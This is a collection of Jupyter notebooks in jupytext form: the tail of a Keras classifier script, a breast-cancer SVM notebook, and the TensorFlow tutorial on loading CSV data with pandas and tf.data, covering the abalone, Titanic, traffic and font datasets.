labels_train = to_categorical(to_int_categorical(extract_labels_alldata(training_data)), num_classes=4)
features_train = extract_features_alldata(training_data)
model = Sequential()
model.add(Dense(100, activation='relu', input_dim=100))
model.add(Dropout(0.5))
model.add(Dense(50, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(4, activation='softmax'))
sgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(loss='categorical_crossentropy',
optimizer=sgd,
metrics=['accuracy'])
model.fit(features_train, labels_train,
epochs=100,
batch_size=32)
score = model.evaluate(features_test, labels_test, batch_size=32)
predictions = model.predict(features_test, batch_size=32)
print(predictions)
print(labels_test)
print(score)
# -
|
predict difficulty choice.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
#import required libraries
import pandas as pd
import numpy as np
#import seaborn as sns
import sklearn
import matplotlib.pyplot as plt
from matplotlib import style
style.use("ggplot")
#importing the dataset
data=pd.read_csv("F:\Datasets\data.csv")
data
data=data.fillna(0)
cols=['id']
data=data.drop(cols,axis=1)
data
data=data.drop('Unnamed: 32',axis=1)
data
data.dtypes
diagnosis=np.unique(data['diagnosis'])
diagnosis
def map_diagnosis(diagnosis):
if diagnosis=='M':
return 1
else:
return 0
data['diagnosis']=data['diagnosis'].apply(map_diagnosis)
y=data['diagnosis']
x=data
x=x.drop('diagnosis',axis=1)
# +
# x=np.array(x)
# x
# +
# y=np.array(y)
# y
# -
from sklearn.model_selection import train_test_split
xtrain,xtest,ytrain,ytest=train_test_split(x,y,test_size=.2)
from sklearn.linear_model import LinearRegression
from sklearn import svm
svm=svm.SVC(kernel='linear')
svm.fit(xtrain,ytrain)
ypred=svm.predict(xtest)
ypred
ytest
# +
# w = svm.coef_[0]
# print(w)
# a = -w[0] / w[1]
# xx = np.linspace(0,12)
# yy = a * xx - svm.intercept_[0] / w[1]
# h0 = plt.plot(xx, yy, 'k-', label="non weighted div")
# plt.scatter(xtrain[:, 0], xtrain[:, 1], c = ytrain)
# plt.legend()
# plt.show()
# -
from sklearn import metrics
print("Accuracy:",metrics.accuracy_score(ytest, ypred))
print("Precision:",metrics.precision_score(ytest, ypred))
print("Recall:",metrics.recall_score(ytest, ypred))
mse=sklearn.metrics.mean_squared_error(ytest,ypred)
print(mse)
# +
# import pickle
# pickle.dump(svm, open('F:\\Datasets\\brestSVM.pkl','wb'))
# # Loading model to compare the results
# model = pickle.load(open('F:\\Datasets\\brestSVM.pkl','rb'))
# -
|
BreastCancerSVM.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="DweYe9FcbMK_"
# ##### Copyright 2019 The TensorFlow Authors.
#
# + cellView="form" id="AVV2e0XKbJeX"
#@title Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# + [markdown] id="sUtoed20cRJJ"
# # Load CSV data
# + [markdown] id="1ap_W4aQcgNT"
# <table class="tfo-notebook-buttons" align="left">
# <td>
# <a target="_blank" href="https://www.tensorflow.org/tutorials/load_data/csv"><img src="https://www.tensorflow.org/images/tf_logo_32px.png" />View on TensorFlow.org</a>
# </td>
# <td>
# <a target="_blank" href="https://colab.research.google.com/github/tensorflow/docs/blob/master/site/en/tutorials/load_data/csv.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />Run in Google Colab</a>
# </td>
# <td>
# <a target="_blank" href="https://github.com/tensorflow/docs/blob/master/site/en/tutorials/load_data/csv.ipynb"><img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />View source on GitHub</a>
# </td>
# <td>
# <a href="https://storage.googleapis.com/tensorflow_docs/docs/site/en/tutorials/load_data/csv.ipynb"><img src="https://www.tensorflow.org/images/download_logo_32px.png" />Download notebook</a>
# </td>
# </table>
# + [markdown] id="C-3Xbt0FfGfs"
# This tutorial provides examples of how to use CSV data with TensorFlow.
#
# There are two main parts to this:
#
# 1. **Loading the data off disk**
# 2. **Pre-processing it into a form suitable for training.**
#
# This tutorial focuses on the loading, and gives some quick examples of preprocessing. For a tutorial that focuses on the preprocessing aspect see the [preprocessing layers guide](https://www.tensorflow.org/guide/keras/preprocessing_layers#quick_recipes) and [tutorial](https://www.tensorflow.org/tutorials/structured_data/preprocessing_layers).
#
# + [markdown] id="fgZ9gjmPfSnK"
# ## Setup
# + id="baYFZMW_bJHh"
import pandas as pd
import numpy as np
# Make numpy values easier to read.
np.set_printoptions(precision=3, suppress=True)
import tensorflow as tf
from tensorflow.keras import layers
# + [markdown] id="1ZhJYbJxHNGJ"
# ## In memory data
# + [markdown] id="ny5TEgcmHjVx"
# For any small CSV dataset the simplest way to train a TensorFlow model on it is to load it into memory as a pandas Dataframe or a NumPy array.
#
# + [markdown] id="LgpBOuU8PGFf"
# A relatively simple example is the [abalone dataset](https://archive.ics.uci.edu/ml/datasets/abalone).
#
# * The dataset is small.
# * All the input features are all limited-range floating point values.
#
# Here is how to download the data into a [Pandas `DataFrame`](https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.html):
# + id="IZVExo9DKoNz"
abalone_train = pd.read_csv(
"https://storage.googleapis.com/download.tensorflow.org/data/abalone_train.csv",
names=["Length", "Diameter", "Height", "Whole weight", "Shucked weight",
"Viscera weight", "Shell weight", "Age"])
abalone_train.head()
# + [markdown] id="hP22mdyPQ1_t"
# The dataset contains a set of measurements of [abalone](https://en.wikipedia.org/wiki/Abalone), a type of sea snail.
#
# 
#
# [“Abalone shell”](https://www.flickr.com/photos/thenickster/16641048623/) (by [<NAME>](https://www.flickr.com/photos/thenickster/), CC BY-SA 2.0)
#
# + [markdown] id="vlfGrk_9N-wf"
# The nominal task for this dataset is to predict the age from the other measurements, so separate the features and labels for training:
#
# + id="udOnDJOxNi7p"
abalone_features = abalone_train.copy()
abalone_labels = abalone_features.pop('Age')
# + [markdown] id="seK9n71-UBfT"
# For this dataset you will treat all features identically. Pack the features into a single NumPy array.:
# + id="Dp3N5McbUMwb"
abalone_features = np.array(abalone_features)
abalone_features
# + [markdown] id="1C1yFOxLOdxh"
# Next make a regression model predict the age. Since there is only a single input tensor, a `keras.Sequential` model is sufficient here.
# + id="d8zzNrZqOmfB"
abalone_model = tf.keras.Sequential([
layers.Dense(64),
layers.Dense(1)
])
abalone_model.compile(loss = tf.losses.MeanSquaredError(),
optimizer = tf.optimizers.Adam())
# + [markdown] id="j6IWeP78O2wE"
# To train that model, pass the features and labels to `Model.fit`:
# + id="uZdpCD92SN3Z"
abalone_model.fit(abalone_features, abalone_labels, epochs=10)
# + [markdown] id="GapLOj1OOTQH"
# You have just seen the most basic way to train a model using CSV data. Next, you will learn how to apply preprocessing to normalize numeric columns.
# + [markdown] id="B87Rd1SOUv02"
# ## Basic preprocessing
# + [markdown] id="yCrB2Jd-U0Vt"
# It's good practice to normalize the inputs to your model. The Keras preprocessing layers provide a convenient way to build this normalization into your model.
#
# The layer will precompute the mean and variance of each column, and use these to normalize the data.
#
# First you create the layer:
# + id="H2WQpDU5VRk7"
normalize = layers.Normalization()
# + [markdown] id="hGgEZE-7Vpt6"
# Then you use the `Normalization.adapt()` method to adapt the normalization layer to your data.
#
# Note: Only use your training data to `.adapt()` preprocessing layers. Do not use your validation or test data.
# + id="2WgOPIiOVpLg"
normalize.adapt(abalone_features)
# + [markdown] id="rE6vh0byV7cE"
# Then use the normalization layer in your model:
# + id="quPcZ9dTWA9A"
norm_abalone_model = tf.keras.Sequential([
normalize,
layers.Dense(64),
layers.Dense(1)
])
norm_abalone_model.compile(loss = tf.losses.MeanSquaredError(),
optimizer = tf.optimizers.Adam())
norm_abalone_model.fit(abalone_features, abalone_labels, epochs=10)
# + [markdown] id="Wuqj601Qw0Ml"
# ## Mixed data types
#
# The "Titanic" dataset contains information about the passengers on the Titanic. The nominal task on this dataset is to predict who survived.
#
# 
#
# Image [from Wikimedia](https://commons.wikimedia.org/wiki/File:RMS_Titanic_3.jpg)
#
# The raw data can easily be loaded as a Pandas `DataFrame`, but is not immediately usable as input to a TensorFlow model.
#
# + id="GS-dBMpuYMnz"
titanic = pd.read_csv("https://storage.googleapis.com/tf-datasets/titanic/train.csv")
titanic.head()
# + id="D8rCGIK1ZzKx"
titanic_features = titanic.copy()
titanic_labels = titanic_features.pop('survived')
# + [markdown] id="urHOwpCDYtcI"
# Because of the different data types and ranges you can't simply stack the features into NumPy array and pass it to a `keras.Sequential` model. Each column needs to be handled individually.
#
# As one option, you could preprocess your data offline (using any tool you like) to convert categorical columns to numeric columns, then pass the processed output to your TensorFlow model. The disadvantage to that approach is that if you save and export your model the preprocessing is not saved with it. The Keras preprocessing layers avoid this problem because they're part of the model.
#
# + [markdown] id="Bta4Sx0Zau5v"
# In this example, you'll build a model that implements the preprocessing logic using [Keras functional API](https://www.tensorflow.org/guide/keras/functional). You could also do it by [subclassing](https://www.tensorflow.org/guide/keras/custom_layers_and_models).
#
# The functional API operates on "symbolic" tensors. Normal "eager" tensors have a value. In contrast these "symbolic" tensors do not. Instead they keep track of which operations are run on them, and build representation of the calculation, that you can run later. Here's a quick example:
# + id="730F16_97D-3"
# Create a symbolic input
input = tf.keras.Input(shape=(), dtype=tf.float32)
# Perform a calculation using the input
result = 2*input + 1
# the result doesn't have a value
result
# + id="RtcNXWB18kMJ"
calc = tf.keras.Model(inputs=input, outputs=result)
# + id="fUGQOUqZ8sa-"
print(calc(1).numpy())
print(calc(2).numpy())
# + [markdown] id="rNS9lT7f6_U2"
# To build the preprocessing model, start by building a set of symbolic `keras.Input` objects, matching the names and data-types of the CSV columns.
# + id="5WODe_1da3yw"
inputs = {}
for name, column in titanic_features.items():
dtype = column.dtype
if dtype == object:
dtype = tf.string
else:
dtype = tf.float32
inputs[name] = tf.keras.Input(shape=(1,), name=name, dtype=dtype)
inputs
# + [markdown] id="aaheJFmymq8l"
# The first step in your preprocessing logic is to concatenate the numeric inputs together, and run them through a normalization layer:
# + id="wPRC_E6rkp8D"
numeric_inputs = {name:input for name,input in inputs.items()
if input.dtype==tf.float32}
x = layers.Concatenate()(list(numeric_inputs.values()))
norm = layers.Normalization()
norm.adapt(np.array(titanic[numeric_inputs.keys()]))
all_numeric_inputs = norm(x)
all_numeric_inputs
# + [markdown] id="-JoR45Uj712l"
# Collect all the symbolic preprocessing results, to concatenate them later.
# + id="M7jIJw5XntdN"
preprocessed_inputs = [all_numeric_inputs]
# + [markdown] id="r0Hryylyosfm"
# For the string inputs use the `tf.keras.layers.StringLookup` function to map from strings to integer indices in a vocabulary. Next, use `tf.keras.layers.CategoryEncoding` to convert the indexes into `float32` data appropriate for the model.
#
# The default settings for the `tf.keras.layers.CategoryEncoding` layer create a one-hot vector for each input. A `layers.Embedding` would also work. See the [preprocessing layers guide](https://www.tensorflow.org/guide/keras/preprocessing_layers#quick_recipes) and [tutorial](../structured_data/preprocessing_layers.ipynb) for more on this topic.
# + id="79fi1Cgan2YV"
for name, input in inputs.items():
if input.dtype == tf.float32:
continue
lookup = layers.StringLookup(vocabulary=np.unique(titanic_features[name]))
one_hot = layers.CategoryEncoding(max_tokens=lookup.vocab_size())
x = lookup(input)
x = one_hot(x)
preprocessed_inputs.append(x)
# + [markdown] id="Wnhv0T7itnc7"
# With the collection of `inputs` and `processed_inputs`, you can concatenate all the preprocessed inputs together, and build a model that handles the preprocessing:
# + id="XJRzUTe8ukXc"
preprocessed_inputs_cat = layers.Concatenate()(preprocessed_inputs)
titanic_preprocessing = tf.keras.Model(inputs, preprocessed_inputs_cat)
tf.keras.utils.plot_model(model = titanic_preprocessing , rankdir="LR", dpi=72, show_shapes=True)
# + [markdown] id="PNHxrNW8vdda"
# This `model` just contains the input preprocessing. You can run it to see what it does to your data. Keras models don't automatically convert Pandas `DataFrames` because it's not clear if it should be converted to one tensor or to a dictionary of tensors. So convert it to a dictionary of tensors:
# + id="5YjdYyMEacwQ"
titanic_features_dict = {name: np.array(value)
for name, value in titanic_features.items()}
# + [markdown] id="0nKJYoPByada"
# Slice out the first training example and pass it to this preprocessing model, you see the numeric features and string one-hots all concatenated together:
# + id="SjnmU8PSv8T3"
features_dict = {name:values[:1] for name, values in titanic_features_dict.items()}
titanic_preprocessing(features_dict)
# + [markdown] id="qkBf4LvmzMDp"
# Now build the model on top of this:
# + id="coIPtGaCzUV7"
def titanic_model(preprocessing_head, inputs):
body = tf.keras.Sequential([
layers.Dense(64),
layers.Dense(1)
])
preprocessed_inputs = preprocessing_head(inputs)
result = body(preprocessed_inputs)
model = tf.keras.Model(inputs, result)
model.compile(loss=tf.losses.BinaryCrossentropy(from_logits=True),
optimizer=tf.optimizers.Adam())
return model
titanic_model = titanic_model(titanic_preprocessing, inputs)
# + [markdown] id="LK5uBQQF2KbZ"
# When you train the model, pass the dictionary of features as `x`, and the label as `y`.
# + id="D1gVfwJ61ejz"
titanic_model.fit(x=titanic_features_dict, y=titanic_labels, epochs=10)
# + [markdown] id="LxgJarZk3bfH"
# Since the preprocessing is part of the model, you can save the model and reload it somewhere else and get identical results:
# + id="Ay-8ymNA2ZCh"
titanic_model.save('test')
reloaded = tf.keras.models.load_model('test')
# + id="Qm6jMTpD20lK"
features_dict = {name:values[:1] for name, values in titanic_features_dict.items()}
before = titanic_model(features_dict)
after = reloaded(features_dict)
assert (before-after)<1e-3
print(before)
print(after)
# + [markdown] id="7VsPlxIRZpXf"
# ## Using tf.data
#
# + [markdown] id="NyVDCwGzR5HW"
# In the previous section you relied on the model's built-in data shuffling and batching while training the model.
#
# If you need more control over the input data pipeline or need to use data that doesn't easily fit into memory: use `tf.data`.
#
# For more examples see the [tf.data guide](../../guide/data.ipynb).
# + [markdown] id="gP5Y1jM2Sor0"
# ### On in memory data
#
# As a first example of applying `tf.data` to CSV data consider the following code to manually slice up the dictionary of features from the previous section. For each index, it takes that index for each feature:
#
# + id="i8wE-MVuVu7_"
import itertools
def slices(features):
for i in itertools.count():
# For each feature take index `i`
example = {name:values[i] for name, values in features.items()}
yield example
# + [markdown] id="cQ3RTbS9YEal"
# Run this and print the first example:
# + id="Wwq8XK88WwFk"
for example in slices(titanic_features_dict):
for name, value in example.items():
print(f"{name:19s}: {value}")
break
# + [markdown] id="vvp8Dct6YOIE"
# The most basic `tf.data.Dataset` in memory data loader is the `Dataset.from_tensor_slices` constructor. This returns a `tf.data.Dataset` that implements a generalized version of the above `slices` function, in TensorFlow.
# + id="2gEJthslYxeV"
features_ds = tf.data.Dataset.from_tensor_slices(titanic_features_dict)
# + [markdown] id="-ZC0rTpMZMZK"
# You can iterate over a `tf.data.Dataset` like any other python iterable:
# + id="gOHbiefaY4ag"
for example in features_ds:
for name, value in example.items():
print(f"{name:19s}: {value}")
break
# + [markdown] id="uwcFoVJWZY5F"
# The `from_tensor_slices` function can handle any structure of nested dictionaries or tuples. The following code makes a dataset of `(features_dict, labels)` pairs:
# + id="xIHGBy76Zcrx"
titanic_ds = tf.data.Dataset.from_tensor_slices((titanic_features_dict, titanic_labels))
# + [markdown] id="gQwxitt8c2GK"
# To train a model using this `Dataset`, you'll need to at least `shuffle` and `batch` the data.
# + id="SbJcbldhddeC"
titanic_batches = titanic_ds.shuffle(len(titanic_labels)).batch(32)
# + [markdown] id="-4FRqhRFuoJx"
# Instead of passing `features` and `labels` to `Model.fit`, you pass the dataset:
# + id="8yXkNPumdBtB"
titanic_model.fit(titanic_batches, epochs=5)
# + [markdown] id="qXuibiv9exT7"
# ### From a single file
#
# So far this tutorial has worked with in-memory data. `tf.data` is a highly scalable toolkit for building data pipelines, and provides a few functions for dealing loading CSV files.
# + id="Ncf5t6tgL5ZI"
titanic_file_path = tf.keras.utils.get_file("train.csv", "https://storage.googleapis.com/tf-datasets/titanic/train.csv")
# + [markdown] id="t4N-plO4tDXd"
# Now read the CSV data from the file and create a `tf.data.Dataset`.
#
# (For the full documentation, see `tf.data.experimental.make_csv_dataset`)
#
# + id="yIbUscB9sqha"
titanic_csv_ds = tf.data.experimental.make_csv_dataset(
titanic_file_path,
batch_size=5, # Artificially small to make examples easier to show.
label_name='survived',
num_epochs=1,
ignore_errors=True,)
# + [markdown] id="Sf3v3BKgy4AG"
# This function includes many convenient features so the data is easy to work with. This includes:
#
# * Using the column headers as dictionary keys.
# * Automatically determining the type of each column.
# + id="v4oMO9MIxgTG"
for batch, label in titanic_csv_ds.take(1):
for key, value in batch.items():
print(f"{key:20s}: {value}")
print()
print(f"{'label':20s}: {label}")
# + [markdown] id="k-TgA6o2Ja6U"
# Note: if you run the above cell twice it will produce different results. The default settings for `make_csv_dataset` include `shuffle_buffer_size=1000`, which is more than sufficient for this small dataset, but may not be for a real-world dataset.
# + [markdown] id="d6uviU_KCCWD"
# It can also decompress the data on the fly. Here's a gzipped CSV file containing the [metro interstate traffic dataset](https://archive.ics.uci.edu/ml/datasets/Metro+Interstate+Traffic+Volume)
#
# 
#
# Image [from Wikimedia](https://commons.wikimedia.org/wiki/File:Trafficjam.jpg)
#
# + id="kT7oZI2E46Q8"
traffic_volume_csv_gz = tf.keras.utils.get_file(
'Metro_Interstate_Traffic_Volume.csv.gz',
"https://archive.ics.uci.edu/ml/machine-learning-databases/00492/Metro_Interstate_Traffic_Volume.csv.gz",
cache_dir='.', cache_subdir='traffic')
# + [markdown] id="F-IOsFHbCw0i"
# Set the `compression_type` argument to read directly from the compressed file:
# + id="ar0MPEVJ5NeA"
traffic_volume_csv_gz_ds = tf.data.experimental.make_csv_dataset(
traffic_volume_csv_gz,
batch_size=256,
label_name='traffic_volume',
num_epochs=1,
compression_type="GZIP")
for batch, label in traffic_volume_csv_gz_ds.take(1):
for key, value in batch.items():
print(f"{key:20s}: {value[:5]}")
print()
print(f"{'label':20s}: {label[:5]}")
# + [markdown] id="p12Y6tGq8D6M"
# Note: If you need to parse those date-time strings in the `tf.data` pipeline you can use `tfa.text.parse_time`.
# + [markdown] id="EtrAXzYGP3l0"
# ### Caching
# + [markdown] id="fN2dL_LRP83r"
# There is some overhead to parsing the csv data. For small models this can be the bottleneck in training.
#
# Depending on your use case it may be a good idea to use `Dataset.cache` or `data.experimental.snapshot` so that the csv data is only parsed on the first epoch.
#
# The main difference between the `cache` and `snapshot` methods is that `cache` files can only be used by the TensorFlow process that created them, but `snapshot` files can be read by other processes.
#
# For example, iterating over the `traffic_volume_csv_gz_ds` 20 times, takes ~15 seconds without caching, or ~2s with caching.
# + id="Qk38Sw4MO4eh"
# %%time
for i, (batch, label) in enumerate(traffic_volume_csv_gz_ds.repeat(20)):
if i % 40 == 0:
print('.', end='')
print()
# + [markdown] id="pN3HtDONh5TX"
# Note: `Dataset.cache` stores the data form the first epoch and replays it in order. So using `.cache` disables any shuffles earlier in the pipeline. Below the `.shuffle` is added back in after `.cache`.
# + id="r5Jj72MrPbnh"
# %%time
caching = traffic_volume_csv_gz_ds.cache().shuffle(1000)
for i, (batch, label) in enumerate(caching.shuffle(1000).repeat(20)):
if i % 40 == 0:
print('.', end='')
print()
# + [markdown] id="wN7uUBjmgNZ9"
# Note: `snapshot` files are meant for *temporary* storage of a dataset while in use. This is *not* a format for long term storage. The file format is considered an internal detail, and not guaranteed between TensorFlow versions.
# + id="PHGD1E8ktUvW"
# %%time
snapshot = tf.data.experimental.snapshot('titanic.tfsnap')
snapshotting = traffic_volume_csv_gz_ds.apply(snapshot).shuffle(1000)
for i, (batch, label) in enumerate(snapshotting.shuffle(1000).repeat(20)):
if i % 40 == 0:
print('.', end='')
print()
# + [markdown] id="fUSSegnMCGRz"
# If your data loading is slowed by loading csv files, and `cache` and `snapshot` are insufficient for your use case, consider re-encoding your data into a more streamlined format.
# + [markdown] id="M0iGXv9pC5kr"
# ### Multiple files
# + [markdown] id="9FFzHQrCDH4w"
# All the examples so far in this section could easily be done without `tf.data`. One place where `tf.data` can really simplify things is when dealing with collections of files.
#
# For example, the [character font images](https://archive.ics.uci.edu/ml/datasets/Character+Font+Images) dataset is distributed as a collection of csv files, one per font.
#
# 
#
# Image by <a href="https://pixabay.com/users/wilhei-883152/?utm_source=link-attribution&utm_medium=referral&utm_campaign=image&utm_content=705667"><NAME></a> from <a href="https://pixabay.com/?utm_source=link-attribution&utm_medium=referral&utm_campaign=image&utm_content=705667">Pixabay</a>
#
# Download the dataset, and have a look at the files inside:
# + id="RmVknMdJh5ks"
fonts_zip = tf.keras.utils.get_file(
'fonts.zip', "https://archive.ics.uci.edu/ml/machine-learning-databases/00417/fonts.zip",
cache_dir='.', cache_subdir='fonts',
extract=True)
# + id="xsDlMCnyi55e"
import pathlib
font_csvs = sorted(str(p) for p in pathlib.Path('fonts').glob("*.csv"))
font_csvs[:10]
# + id="lRAEJx9ROAGl"
len(font_csvs)
# + [markdown] id="19Udrw9iG-FS"
# When dealing with a bunch of files you can pass a glob-style `file_pattern` to the `experimental.make_csv_dataset` function. The order of the files is shuffled each iteration.
#
# Use the `num_parallel_reads` argument to set how many files are read in parallel and interleaved together.
# + id="6TSUNdT6iG58"
fonts_ds = tf.data.experimental.make_csv_dataset(
file_pattern = "fonts/*.csv",
batch_size=10, num_epochs=1,
num_parallel_reads=20,
shuffle_buffer_size=10000)
# + [markdown] id="XMoexinLHYFa"
# These csv files have the images flattened out into a single row. The column names are formatted `r{row}c{column}`. Here's the first batch:
# + id="RmFvBWxxi3pq"
for features in fonts_ds.take(1):
for i, (name, value) in enumerate(features.items()):
if i>15:
break
print(f"{name:20s}: {value}")
print('...')
print(f"[total: {len(features)} features]")
# + [markdown] id="xrC3sKdeOhb5"
# #### Optional: Packing fields
#
# You probably don't want to work with each pixel in separate columns like this. Before trying to use this dataset be sure to pack the pixels into an image-tensor.
#
# Here is code that parses the column names to build images for each example:
# + id="hct5EMEWNyfH"
import re
def make_images(features):
image = [None]*400
new_feats = {}
for name, value in features.items():
match = re.match('r(\d+)c(\d+)', name)
if match:
image[int(match.group(1))*20+int(match.group(2))] = value
else:
new_feats[name] = value
image = tf.stack(image, axis=0)
image = tf.reshape(image, [20, 20, -1])
new_feats['image'] = image
return new_feats
# + [markdown] id="61qy8utAwARP"
# Apply that function to each batch in the dataset:
# + id="DJnnfIW9baE4"
fonts_image_ds = fonts_ds.map(make_images)
for features in fonts_image_ds.take(1):
break
# + [markdown] id="_ThqrthGwHSm"
# Plot the resulting images:
# + id="I5dcey31T_tk"
from matplotlib import pyplot as plt
plt.figure(figsize=(6,6), dpi=120)
for n in range(9):
plt.subplot(3,3,n+1)
plt.imshow(features['image'][..., n])
plt.title(chr(features['m_label'][n]))
plt.axis('off')
# + [markdown] id="7-nNR0Nncdd1"
# ## Lower level functions
# + [markdown] id="3jiGZeUijJNd"
# So far this tutorial has focused on the highest level utilities for reading csv data. There are other two APIs that may be helpful for advanced users if your use-case doesn't fit the basic patterns.
#
# * `tf.io.decode_csv` - a function for parsing lines of text into a list of CSV column tensors.
# * `tf.data.experimental.CsvDataset` - a lower level csv dataset constructor.
#
# This section recreates functionality provided by `make_csv_dataset`, to demonstrate how this lower level functionality can be used.
#
# + [markdown] id="LL_ixywomOHW"
# ### `tf.io.decode_csv`
#
# This function decodes a string, or list of strings into a list of columns.
#
# Unlike `make_csv_dataset` this function does not try to guess column data-types. You specify the column types by providing a list of `record_defaults` containing a value of the correct type, for each column.
#
# To read the Titanic data **as strings** using `decode_csv` you would say:
# + id="m1D2C-qdlqeW"
text = pathlib.Path(titanic_file_path).read_text()
lines = text.split('\n')[1:-1]
all_strings = [str()]*10
all_strings
# + id="9W4UeJYyHPx5"
features = tf.io.decode_csv(lines, record_defaults=all_strings)
for f in features:
print(f"type: {f.dtype.name}, shape: {f.shape}")
# + [markdown] id="j8TaHSQFoQL4"
# To parse them with their actual types, create a list of `record_defaults` of the corresponding types:
# + id="rzUjR59yoUe1"
print(lines[0])
# + id="7sPTunxwoeWU"
titanic_types = [int(), str(), float(), int(), int(), float(), str(), str(), str(), str()]
titanic_types
# + id="n3NlViCzoB7F"
features = tf.io.decode_csv(lines, record_defaults=titanic_types)
for f in features:
print(f"type: {f.dtype.name}, shape: {f.shape}")
# + [markdown] id="m-LkTUTnpn2P"
# Note: it is more efficient to call `decode_csv` on large batches of lines than on individual lines of csv text.
# + [markdown] id="Yp1UItJmqGqw"
# ### `tf.data.experimental.CsvDataset`
#
# The `tf.data.experimental.CsvDataset` class provides a minimal CSV `Dataset` interface without the convenience features of the `make_csv_dataset` function: column header parsing, column type-inference, automatic shuffling, file interleaving.
#
# This constructor follows uses `record_defaults` the same way as `io.parse_csv`:
#
# + id="9OzZLp3krP-t"
simple_titanic = tf.data.experimental.CsvDataset(titanic_file_path, record_defaults=titanic_types, header=True)
for example in simple_titanic.take(1):
print([e.numpy() for e in example])
# + [markdown] id="_HBmfI-Ks7dw"
# The above code is basically equivalent to:
# + id="E5O5d69Yq7gG"
def decode_titanic_line(line):
return tf.io.decode_csv(line, titanic_types)
manual_titanic = (
# Load the lines of text
tf.data.TextLineDataset(titanic_file_path)
# Skip the header row.
.skip(1)
# Decode the line.
.map(decode_titanic_line)
)
for example in manual_titanic.take(1):
print([e.numpy() for e in example])
# + [markdown] id="5R3ralsnt2AC"
# #### Multiple files
#
# To parse the fonts dataset using `experimental.CsvDataset`, you first need to determine the column types for the `record_defaults`. Start by inspecting the first row of one file:
# + id="3tlFOTjCvAI5"
font_line = pathlib.Path(font_csvs[0]).read_text().splitlines()[1]
print(font_line)
# + [markdown] id="etyGu8K_ySRz"
# Only the first two fields are strings, the rest are ints or floats, and you can get the total number of features by counting the commas:
# + id="crgZZn0BzkSB"
num_font_features = font_line.count(',')+1
font_column_types = [str(), str()] + [float()]*(num_font_features-2)
# + [markdown] id="YeK2Pw540RNj"
# The `CsvDatasaet` constructor can take a list of input files, but reads them sequentially. The first file in the list of CSVs is `AGENCY.csv`:
# + id="_SvL5Uvl0r0N"
font_csvs[0]
# + [markdown] id="EfAX3G8Xywy6"
# So when you pass the list of files to `CsvDataaset` the records from `AGENCY.csv` are read first:
# + id="Gtr1E66VmBqj"
simple_font_ds = tf.data.experimental.CsvDataset(
font_csvs,
record_defaults=font_column_types,
header=True)
# + id="k750Mgq4yt_o"
for row in simple_font_ds.take(10):
print(row[0].numpy())
# + [markdown] id="NiqWKQV21FrE"
# To interleave multiple files, use `Dataset.interleave`.
#
# Here's an initial dataset that contains the csv file names:
# + id="t9dS3SNb23W8"
font_files = tf.data.Dataset.list_files("fonts/*.csv")
# + [markdown] id="TNiLHMXpzHy5"
# This shuffles the file names each epoch:
# + id="zNd-TYyNzIgg"
print('Epoch 1:')
for f in list(font_files)[:5]:
print(" ", f.numpy())
print(' ...')
print()
print('Epoch 2:')
for f in list(font_files)[:5]:
print(" ", f.numpy())
print(' ...')
# + [markdown] id="B0QB1PtU3WAN"
# The `interleave` method takes a `map_func` that creates a child-`Dataset` for each element of the parent-`Dataset`.
#
# Here, you want to create a `CsvDataset` from each element of the dataset of files:
# + id="QWp4rH0Q4uPh"
def make_font_csv_ds(path):
return tf.data.experimental.CsvDataset(
path,
record_defaults=font_column_types,
header=True)
# + [markdown] id="VxRGdLMB5nRF"
# The `Dataset` returned by interleave returns elements by cycling over a number of the child-`Dataset`s. Note, below, how the dataset cycles over `cycle_length=3` three font files:
# + id="OePMNF_x1_Cc"
font_rows = font_files.interleave(make_font_csv_ds,
cycle_length=3)
# + id="UORIGWLy54-E"
fonts_dict = {'font_name':[], 'character':[]}
for row in font_rows.take(10):
fonts_dict['font_name'].append(row[0].numpy().decode())
fonts_dict['character'].append(chr(row[2].numpy()))
pd.DataFrame(fonts_dict)
# + [markdown] id="mkKZa_HX8zAm"
# #### Performance
#
# + [markdown] id="8BtGHraUApdJ"
# Earlier, it was noted that `io.decode_csv` is more efficient when run on a batch of strings.
#
# It is possible to take advantage of this fact, when using large batch sizes, to improve CSV loading performance (but try [caching](#caching) first).
# + [markdown] id="d35zWMH7MDL1"
# With the built-in loader 20, 2048-example batches take about 17s.
# + id="ieUVAPryjpJS"
BATCH_SIZE=2048
fonts_ds = tf.data.experimental.make_csv_dataset(
file_pattern = "fonts/*.csv",
batch_size=BATCH_SIZE, num_epochs=1,
num_parallel_reads=100)
# + id="MUC2KW4LkQIz"
# %%time
for i,batch in enumerate(fonts_ds.take(20)):
print('.',end='')
print()
# + [markdown] id="5lhnh6rZEDS2"
# Passing **batches of text lines** to`decode_csv` runs faster, in about 5s:
# + id="4XbPZV1okVF9"
fonts_files = tf.data.Dataset.list_files("fonts/*.csv")
fonts_lines = fonts_files.interleave(
lambda fname:tf.data.TextLineDataset(fname).skip(1),
cycle_length=100).batch(BATCH_SIZE)
fonts_fast = fonts_lines.map(lambda x: tf.io.decode_csv(x, record_defaults=font_column_types))
# + id="te9C2km-qO8W"
# %%time
for i,batch in enumerate(fonts_fast.take(20)):
print('.',end='')
print()
# + [markdown] id="aebC1plsMeOi"
# For another example of increasing csv performance by using large batches see the [overfit and underfit tutorial](../keras/overfit_and_underfit.ipynb).
#
# This sort of approach may work, but consider other options like `cache` and `snapshot`, or re-encoding your data into a more streamlined format.
|
site/en-snapshot/tutorials/load_data/csv.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: mydsp
# language: python
# name: mydsp
# ---
